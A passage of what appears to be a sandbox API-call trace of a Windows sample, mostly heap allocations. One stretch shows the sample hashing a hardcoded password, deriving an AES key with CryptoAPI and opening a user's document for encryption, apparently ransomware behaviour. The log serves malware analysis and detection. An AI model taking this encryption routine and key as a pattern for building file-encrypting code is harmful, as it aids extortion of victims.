hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0210 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0083.326] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3710 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42da070 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b80 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36c8 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c37b8 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3848 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3650 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3800 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0083.327] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0083.327] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0083.328] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cb180, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0083.328] CloseHandle (hObject=0x258) returned 1 [0083.328] FreeLibrary (hLibModule=0x772d0000) returned 1 [0083.329] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0083.329] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\zSm3MoFqp.odp", lpFindFileData=0x144e3c8 | out: lpFindFileData=0x144e3c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd43305b0, ftCreationTime.dwHighDateTime=0x1d5ee22, ftLastAccessTime.dwLowDateTime=0x1c93bf30, ftLastAccessTime.dwHighDateTime=0x1d5ea6c, ftLastWriteTime.dwLowDateTime=0x1c93bf30, ftLastWriteTime.dwHighDateTime=0x1d5ea6c, nFileSizeHigh=0x0, nFileSizeLow=0xb865, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="zSm3MoFqp.odp", cAlternateFileName="ZSM3MO~1.ODP")) returned 0x41ac440 [0083.329] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0083.329] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0083.329] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0083.330] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0083.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797048, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0083.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0083.330] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0083.330] CryptAcquireContextA (in: phProv=0x144e0a8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e0a8*=0x41a4f20) returned 1 [0083.331] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0083.331] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0083.331] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0083.331] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0083.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0083.332] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0083.332] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.332] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0083.332] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0083.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43c37b8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0083.332] CryptCreateHash (in: hProv=0x41a4f20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144de18 | out: phHash=0x144de18) returned 1 [0083.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0083.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b18, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0083.332] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0083.332] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0083.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2bd8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0083.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0083.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c3830, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0083.333] CryptHashData (hHash=0x41ac780, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0083.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.333] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0083.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0083.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3818, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0083.333] CryptDeriveKey (in: hProv=0x41a4f20, Algid=0x6610, hBaseData=0x41ac780, dwFlags=0x1, phKey=0x144de18 | out: phKey=0x144de18*=0x41ac000) returned 1 [0083.333] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0083.333] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0083.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0083.333] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796fc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0083.334] CryptDestroyHash (hHash=0x41ac780) returned 1 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eafd0 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d20 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39f8 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3968 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c39c8 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3a40 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c38f0 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3b30 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cf0 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b50 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3830 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b80 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3728 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0083.334] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2be0 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0083.335] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0083.335] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0083.335] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ca0 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0083.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ca0 | out: hHeap=0x1780000) returned 1 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bb0 [0083.335] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bb0 | out: hHeap=0x1780000) returned 1 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0083.335] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ca0 [0083.336] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\zSm3MoFqp.odp" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\zsm3mofqp.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0083.336] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.336] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e550 | out: lpNewFilePointer=0x0) returned 1 [0083.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0083.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0083.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2be0 [0083.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0083.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0083.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0083.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0083.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0083.336] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0083.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0083.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c10 [0083.336] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0083.336] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c10 | out: hHeap=0x1780000) returned 1 [0083.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0083.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0083.337] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0083.337] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b70 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0083.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cd0 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0083.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0083.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0083.337] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0083.337] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c30 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0083.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3f0 | out: hHeap=0x1780000) returned 1 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x43ece68 [0083.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0083.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb4b0 | out: hHeap=0x1780000) returned 1 [0083.338] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0083.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ece68 | out: hHeap=0x1780000) returned 1 [0083.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.338] 